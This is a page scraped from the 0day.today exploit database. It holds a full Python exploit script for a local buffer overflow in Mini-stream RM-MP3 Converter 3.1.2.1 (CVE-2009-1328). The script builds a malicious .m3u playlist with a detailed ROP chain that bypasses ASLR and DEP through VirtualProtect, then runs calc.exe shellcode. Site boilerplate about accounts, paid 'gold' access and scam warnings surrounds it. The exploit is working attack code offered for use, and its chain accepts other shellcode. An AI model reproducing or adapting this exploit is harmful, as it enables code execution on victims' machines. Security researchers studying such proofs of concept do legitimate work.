0day.today - Biggest Exploit Database in the World.

Select your language:

Things you should know about 0day.today:

We use one main domain: http://0day.today
Most of the materials is completely FREE
If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD

We accept currencies: [contact admin to find more]

We don't want you to use our site as a tool for hacking purposes, so any kind of action that could affect illegaly other users or websites that you don't have right to access will be banned and your account including your data will be destroyed.

Administration of this site uses the official contacts. Beware of impostors!

We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!

I am registered user of 0day.today. I don't want to see this screen in future.

What to do first?

Read the [ agreement ]
Read the [ Submit ] rules
Visit the [ faq ] page
[ Register ] profile
Get [ GOLD ]
If you want to [ sell ]
If you want to [ buy ]
If you lost [ Account ]
Any questions [ admin@0day.today ]

Main links

You can contact us by

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

[ authorization ] [ registration ] [ restore account ]

You can contact us by:

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

Mini-stream RM-MP3 Converter 3.1.2.1.2010.03.30 Buffer Overflow (ASLR and DEP Bypass)

Author

Ptrace Security

Risk

[

Security Risk Medium

]

0day-ID

Category

Date add

Platform

# Exploit Title: Mini-stream RM-MP3 Converter 3.1.2.1.2010.03.30 local buffer overflow (\w ASLR and DEP bypass)
# Date: 26 July 2012
# Exploit Author: Gianni Gnesa
# Vendor Homepage: http://mini-stream.net/
# Software Link: http://mini-stream.net/rm-to-mp3-converter/download
# Version: 3.1.2.1.2010.03.30
# Tested on: Windows 7 SP1 (VMware)
# References: CVE-2009-1328, BID 34494
 
from struct import pack
 
fname = "rop.m3u"
hdr   = "http://."
junk1 = "A" * 17416     # junk
 
rop =   [
            0x10041720, # RETN [MSRMfilter03.dll]
            0x41414141, # Compensate
 
 
            #### Save ESP into ESI
            # EAX=EBP
            0x1001a503, # XOR EAX,EAX / RETN [MSRMfilter03.dll]
            0x10051ff5, # ADD EAX,EBP / RETN [MSRMfilter03.dll]
             
            # ESI=EAX
            0x1005bb8e, # PUSH EAX / ADD DWORD PTR SS:[EBP+5],ESI / PUSH 1 / POP EAX / POP ESI / RETN [MSRMfilter03.dll]
             
            # EBX=ESI
            0x1001217b, # PUSH ESI / ADD AL,5E / POP EBX / RETN [MSRMfilter03.dll]
 
            # EDX=EBX
            0x1002991c, # XOR EDX,EDX / RETN [MSRMfilter03.dll]
            0x10029f3e, # ADD EDX,EBX / POP EBX / RETN 10 [MSRMfilter03.dll]
            0x41414141, # Junk popped in EBX
  
            # ESI=ESP
            0x10032D54, # PUSH ESP / AND AL,10 / POP ESI / MOV DWORD PTR DS:[EDX],ECX / RETN [MSRMfilter03.dll]
            0x41414141, # Junk for RETN
            0x41414141, # Junk for RETN
            0x41414141, # Junk for RETN
            0x41414141, # Junk for RETN
 
             
            #### Jump over VirtualProtect()
            0x100237C8, # ADD ESP, 20 / RETN [MSRMfilter03.dll]
             
            0x58585858, # VirtualProtect()
            0x58585858, # Return Address
            0x58585858, # lpAddress
            0x58585858, # dwSize
            0x58585858, # flNewProtect
            0x10085515, # lpflOldProtect  [Address in MSRMfilter03.dll]
 
            0x90909090, # Padding
            0x90909090, # Padding
            # ADD ESP,20 / RETN will land here
 
 
            #### Find kernel32.VirtualProtect
            # Save ESI (Saved ESP) into EBX
            0x1001217b, # PUSH ESI / ADD AL,5E / POP EBX / RETN [MSRMfilter03.dll]
 
            # EAX = Saved ESP - 0xACE4
            0x1002ca2d, # POP EAX / RETN [MSRMfilter03.dll]
            0xFFFF531C, # -0xACE4 (offset from the Saved ESP to the kernel32.XXXXBBE4 in the stack)
            0x10033bbb, # ADD EAX,ESI / POP ESI / RETN [MSRMfilter03.dll]
            0x41414141, # Junk popped in ESI
 
            # Pickup kernel32.XXXXBBE4 into EAX
            0x10027f59, # MOV EAX,DWORD PTR DS:[EAX] / RETN [MSRMfilter03.dll]
 
            # Find kernel32.VirtualProtect
            0x1001263D, # POP ECX / RETN [MSRMfilter03.dll]
            0xFFFF675D, # -0x98A3 (offset from kernel32.XXXXBBE4 to kernel32.VirtualProtect)
            0x1001451e, # ADD EAX,ECX / RETN [MSRMfilter03.dll]
 
 
            ##### Write VirtualProtect address to memory
            # EDX = EBX = Saved ESP
            0x1002993c, # XOR EDX,EDX / RETN [MSRMfilter03.dll]
            0x10029f3e, # ADD EDX,EBX / POP EBX / RETN 10 [MSRMfilter03.dll]
            0x41414141, # Junk popped in EBX
 
            # EDX = EDX + 4
            0x10028fe6, # INC EDX / CLD / POP ESI / POP EDI / POP EBX / RETN [MSRMfilter03.dll]
            0x41414141, # Junk for RETN
            0x41414141, # Junk for RETN
            0x41414141, # Junk for RETN
            0x41414141, # Junk for RETN
            0x41414141, # Junk for ESI
            0x41414141, # Junk for EDI
            0x41414141, # Junk for EBX
            0x10028fe6, # INC EDX / CLD / POP ESI / POP EDI / POP EBX / RETN [MSRMfilter03.dll]
            0x41414141, # Junk for ESI
            0x41414141, # Junk for EDI
            0x41414141, # Junk for EBX
            0x10028fe6, # INC EDX / CLD / POP ESI / POP EDI / POP EBX / RETN [MSRMfilter03.dll]
            0x41414141, # Junk for ESI
            0x41414141, # Junk for EDI
            0x41414141, # Junk for EBX
            0x10028fe6, # INC EDX / CLD / POP ESI / POP EDI / POP EBX / RETN [MSRMfilter03.dll]
            0x41414141, # Junk for ESI
            0x41414141, # Junk for EDI
            0x41414141, # Junk for EBX
             
            # Write VirtualProtect address to memory
            0x10031e2e, # MOV DWORD PTR DS:[EDX],EAX / MOV EAX,3 / RETN [MSRMfilter03.dll]
 
 
            #### Write return address to memory
            # EAX = EDX (Saved ESP) + 0x300
            0x1002fa6a, # MOV EAX,EDX / RETN [MSRMfilter03.dll]
            0x10031c8c, # ADD EAX,100 / POP EBP / RETN [MSRMfilter03.dll]
            0x41414141, # Junk popped in EBP
            0x10031c8c, # ADD EAX,100 / POP EBP / RETN [MSRMfilter03.dll]
            0x41414141, # Junk popped in EBP
            0x10031c8c, # ADD EAX,100 / POP EBP / RETN [MSRMfilter03.dll]
            0x41414141, # Junk popped in EBP
 
            # EDX = EDX + 4
            0x10028fe6, # INC EDX / CLD / POP ESI / POP EDI / POP EBX / RETN [MSRMfilter03.dll]
            0x41414141, # Junk for ESI
            0x41414141, # Junk for EDI
            0x41414141, # Junk for EBX
            0x10028fe6, # INC EDX / CLD / POP ESI / POP EDI / POP EBX / RETN [MSRMfilter03.dll]
            0x41414141, # Junk for ESI
            0x41414141, # Junk for EDI
            0x41414141, # Junk for EBX
            0x10028fe6, # INC EDX / CLD / POP ESI / POP EDI / POP EBX / RETN [MSRMfilter03.dll]
            0x41414141, # Junk for ESI
            0x41414141, # Junk for EDI
            0x41414141, # Junk for EBX
            0x10028fe6, # INC EDX / CLD / POP ESI / POP EDI / POP EBX / RETN [MSRMfilter03.dll]
            0x41414141, # Junk for ESI
            0x41414141, # Junk for EDI
            0x41414141, # Junk for EBX
             
            # Write return address to memory
            0x10031e2e, # MOV DWORD PTR DS:[EDX],EAX / MOV EAX,3 / RETN [MSRMfilter03.dll]
 
 
            #### Write lpAddress parameter to memory
            # EAX = EDX (Saved ESP) + 0x300
            0x1002fa6a, # MOV EAX,EDX / RETN [MSRMfilter03.dll]
            0x1001263D, # POP ECX / RETN [MSRMfilter03.dll]
            0xFFFFFFFC, # -0x4 (compensate EDX increment)
            0x1001451e, # ADD EAX,ECX / RETN [MSRMfilter03.dll]
            0x10031c8c, # ADD EAX,100 / POP EBP / RETN [MSRMfilter03.dll]
            0x41414141, # Junk popped in EBP
            0x10031c8c, # ADD EAX,100 / POP EBP / RETN [MSRMfilter03.dll]
            0x41414141, # Junk popped in EBP
            0x10031c8c, # ADD EAX,100 / POP EBP / RETN [MSRMfilter03.dll]
            0x41414141, # Junk popped in EBP
 
            # EDX = EDX + 4
            0x10028fe6, # INC EDX / CLD / POP ESI / POP EDI / POP EBX / RETN [MSRMfilter03.dll]
            0x41414141, # Junk for ESI
            0x41414141, # Junk for EDI
            0x41414141, # Junk for EBX
            0x10028fe6, # INC EDX / CLD / POP ESI / POP EDI / POP EBX / RETN [MSRMfilter03.dll]
            0x41414141, # Junk for ESI
            0x41414141, # Junk for EDI
            0x41414141, # Junk for EBX
            0x10028fe6, # INC EDX / CLD / POP ESI / POP EDI / POP EBX / RETN [MSRMfilter03.dll]
            0x41414141, # Junk for ESI
            0x41414141, # Junk for EDI
            0x41414141, # Junk for EBX
            0x10028fe6, # INC EDX / CLD / POP ESI / POP EDI / POP EBX / RETN [MSRMfilter03.dll]
            0x41414141, # Junk for ESI
            0x41414141, # Junk for EDI
            0x41414141, # Junk for EBX
             
            # Write lpAddress parameter to memory
            0x10031e2e, # MOV DWORD PTR DS:[EDX],EAX / MOV EAX,3 / RETN [MSRMfilter03.dll]
 
 
            #### Write dwSize parameter to memory
            # EAX = 0x400
            0x1001a503, # XOR EAX,EAX / RETN [MSRMfilter03.dll]
            0x10031c8c, # ADD EAX,100 / POP EBP / RETN [MSRMfilter03.dll]
            0x41414141, # Junk popped in EBP
            0x10031c8c, # ADD EAX,100 / POP EBP / RETN [MSRMfilter03.dll]
            0x41414141, # Junk popped in EBP
            0x10031c8c, # ADD EAX,100 / POP EBP / RETN [MSRMfilter03.dll]
            0x41414141, # Junk popped in EBP
            0x10031c8c, # ADD EAX,100 / POP EBP / RETN [MSRMfilter03.dll]
            0x41414141, # Junk popped in EBP
 
            # EDX = EDX + 4
            0x10028fe6, # INC EDX / CLD / POP ESI / POP EDI / POP EBX / RETN [MSRMfilter03.dll]
            0x41414141, # Junk for ESI
            0x41414141, # Junk for EDI
            0x41414141, # Junk for EBX
            0x10028fe6, # INC EDX / CLD / POP ESI / POP EDI / POP EBX / RETN [MSRMfilter03.dll]
            0x41414141, # Junk for ESI
            0x41414141, # Junk for EDI
            0x41414141, # Junk for EBX
            0x10028fe6, # INC EDX / CLD / POP ESI / POP EDI / POP EBX / RETN [MSRMfilter03.dll]
            0x41414141, # Junk for ESI
            0x41414141, # Junk for EDI
            0x41414141, # Junk for EBX
            0x10028fe6, # INC EDX / CLD / POP ESI / POP EDI / POP EBX / RETN [MSRMfilter03.dll]
            0x41414141, # Junk for ESI
            0x41414141, # Junk for EDI
            0x41414141, # Junk for EBX
             
            # Write dwSize parameter to memory
            0x10031e2e, # MOV DWORD PTR DS:[EDX],EAX / MOV EAX,3 / RETN [MSRMfilter03.dll]
 
 
            #### Write flNewProtect parameter to memory
            # EAX = 0x40
            0x1001a503, # XOR EAX,EAX / RETN [MSRMfilter03.dll]
            0x10031c81, # ADD EAX,40 # POP EBP / RETN [MSRMfilter03.dll]
            0x41414141, # Junk popped in EBP
             
            # EDX = EDX + 4
            0x10028fe6, # INC EDX / CLD / POP ESI / POP EDI / POP EBX / RETN [MSRMfilter03.dll]
            0x41414141, # Junk for ESI
            0x41414141, # Junk for EDI
            0x41414141, # Junk for EBX
            0x10028fe6, # INC EDX / CLD / POP ESI / POP EDI / POP EBX / RETN [MSRMfilter03.dll]
            0x41414141, # Junk for ESI
            0x41414141, # Junk for EDI
            0x41414141, # Junk for EBX
            0x10028fe6, # INC EDX / CLD / POP ESI / POP EDI / POP EBX / RETN [MSRMfilter03.dll]
            0x41414141, # Junk for ESI
            0x41414141, # Junk for EDI
            0x41414141, # Junk for EBX
            0x10028fe6, # INC EDX / CLD / POP ESI / POP EDI / POP EBX / RETN [MSRMfilter03.dll]
            0x41414141, # Junk for ESI
            0x41414141, # Junk for EDI
            0x41414141, # Junk for EBX
             
            # Write flNewProtect parameter to memory
            0x10031e2e, # MOV DWORD PTR DS:[EDX],EAX / MOV EAX,3 / RETN [MSRMfilter03.dll]
 
 
            #### Call VirtualProtect
            0x1002fa6a, # MOV EAX,EDX / RETN [MSRMfilter03.dll]
            0x1001263D, # POP ECX / RETN [MSRMfilter03.dll]
            0xFFFFFFF0, # -0x10 (Move EDX back to the VirtualProtect call)
            0x1001451e, # ADD EAX,ECX / RETN [MSRMfilter03.dll]
            0x1002fe81, # XCHG EAX,ESP / RETN [MSRMfilter03.dll]
        ]
 
nops = "\x90" * 240
 
# calc.exe payload
shellcode = (
"\x66\x81\xE4\xFC\xFF\x31\xD2\x52\x68\x63\x61\x6C\x63\x89\xE6\x52"
"\x56\x64\x8B\x72\x30\x8B\x76\x0C\x8B\x76\x0C\xAD\x8B\x30\x8B\x7E"
"\x18\x8B\x5F\x3C\x8B\x5C\x1F\x78\x8B\x74\x1F\x20\x01\xFE\x8B\x4C"
"\x1F\x24\x01\xF9\x42\xAD\x81\x3C\x07\x57\x69\x6E\x45\x75\xF5\x0F"
"\xB7\x54\x51\xFE\x8B\x74\x1F\x1C\x01\xFE\x03\x3C\x96\xFF\xD7"
)
 
 
print "Mini-stream RM-MP3 Converter 3.1.2.1.2010.03.30"
print "Local buffer overflow (\w ASLR and DEP bypass)\n"
 
payload = hdr + junk1 + pack('<'+str(len(rop))+'L',*rop) + nops + shellcode
 
f = open(fname, "w")
f.write(payload)
f.close()
 
print "%s file created!" % fname



#  0day.today [2024-11-15]  #

We DO NOT use Telegram or any messengers / social networks!

Please, beware of scammers!

Mini-stream RM-MP3 Converter 3.1.2.1.2010.03.30 Buffer Overflow (ASLR and DEP Bypass)

Report Error

Report Error